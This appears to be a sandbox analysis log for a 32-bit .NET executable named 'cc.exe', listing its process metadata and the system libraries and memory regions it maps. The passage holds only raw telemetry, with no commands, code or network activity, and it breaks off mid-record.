# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 28.09.2021 08:19:06.468 Process: id = "1" image_name = "cc.exe" filename = "c:\\users\\keecfmwgj\\desktop\\cc.exe" page_root = "0x3e102000" os_pid = "0xf64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x45c" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\cc.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 117 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 118 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 119 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 120 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 121 start_va = 0xd0000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 122 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 123 start_va = 0x13d0000 end_va = 0x141dfff monitored = 1 entry_point = 0x14095ce region_type = mapped_file name = "cc.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\cc.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe") Region: id = 124 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 125 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 126 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 127 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 128 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 129 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 130 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 131 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 132 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 272 start_va = 0x140000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 273 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 274 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 275 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 276 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 277 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 278 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 279 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 280 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 281 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 282 start_va = 0x370000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 283 start_va = 0x75250000 end_va = 0x75299fff monitored = 1 entry_point = 0x75252e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 284 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 285 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 286 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 287 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 288 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 289 start_va = 0x60000 end_va = 0xc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 290 start_va = 0x1c0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 291 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 292 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 293 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 294 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 295 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 296 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 297 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 298 start_va = 0x5a0000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 299 start_va = 0x72ae0000 end_va = 0x72b6cfff monitored = 1 entry_point = 0x72af2860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 300 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 301 start_va = 0x76850000 end_va = 0x768a6fff monitored = 0 entry_point = 0x76869ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 302 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 303 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 304 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 305 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 306 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 307 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 308 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 309 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 310 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 311 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 312 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 313 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 314 start_va = 0x1420000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 315 start_va = 0x9b0000 end_va = 0xaaffff monitored = 1 entry_point = 0x9e95ce region_type = mapped_file name = "cc.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\cc.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe") Region: id = 316 start_va = 0x9b0000 end_va = 0xaaffff monitored = 1 entry_point = 0x9e95ce region_type = mapped_file name = "cc.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\cc.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe") Region: id = 317 start_va = 0x74400000 end_va = 0x74408fff monitored = 0 entry_point = 0x74401220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 318 start_va = 0x72330000 end_va = 0x72adefff monitored = 1 entry_point = 0x7234d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 319 start_va = 0x71b80000 end_va = 0x7232efff monitored = 1 entry_point = 0x71b9d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 320 start_va = 0x72330000 end_va = 0x72adefff monitored = 1 entry_point = 0x7234d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 321 start_va = 0x752d0000 end_va = 0x752e3fff monitored = 0 entry_point = 0x752dac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll") Region: id = 322 start_va = 0x72280000 end_va = 0x7232afff monitored = 0 entry_point = 0x72315f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll") Region: id = 323 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 324 start_va = 0x120000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 325 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 326 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 327 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 328 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 329 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 330 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 331 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 332 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 333 start_va = 0x9b0000 end_va = 0xb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 334 start_va = 0xb80000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 335 start_va = 0xa00000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 336 start_va = 0xb40000 end_va = 0xb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 337 start_va = 0xe80000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 338 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 339 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 340 start_va = 0x2820000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 341 start_va = 0x4a0000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 342 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 343 start_va = 0xaa0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 344 start_va = 0xfe0000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 345 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 346 start_va = 0x630000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 347 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 348 start_va = 0x11c0000 end_va = 0x12bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 349 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 350 start_va = 0x4820000 end_va = 0x4aeefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 351 start_va = 0x70dc0000 end_va = 0x721cafff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll") Region: id = 352 start_va = 0x763d0000 end_va = 0x7652bfff monitored = 0 entry_point = 0x7641ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 353 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 354 start_va = 0xb80000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 355 start_va = 0xd40000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 356 start_va = 0xb80000 end_va = 0xc5efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 357 start_va = 0xcc0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 358 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 359 start_va = 0x752c0000 end_va = 0x752c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 360 start_va = 0x721f0000 end_va = 0x72278fff monitored = 1 entry_point = 0x721f1130 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 361 start_va = 0x76ad0000 end_va = 0x76b5efff monitored = 0 entry_point = 0x76ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 362 start_va = 0x240000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 363 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 364 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 365 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 366 start_va = 0x3a0000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 367 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 368 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 369 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 370 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 371 start_va = 0x752a0000 end_va = 0x752b2fff monitored = 1 entry_point = 0x752ad900 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll") Region: id = 372 start_va = 0x4af0000 end_va = 0x4dc1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") Region: id = 373 start_va = 0x4dd0000 end_va = 0x4fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 374 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 375 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 376 start_va = 0x70360000 end_va = 0x70db4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll") Region: id = 377 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 378 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 379 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 380 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 381 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 382 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 383 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 384 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 385 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 386 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 387 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 388 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 389 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 390 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 391 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 392 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 393 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 394 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 395 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 396 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 397 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 398 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 399 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 400 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 401 start_va = 0x701b0000 end_va = 0x70352fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll") Region: id = 402 start_va = 0x6f340000 end_va = 0x701a5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll") Region: id = 403 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 404 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 405 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 406 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private 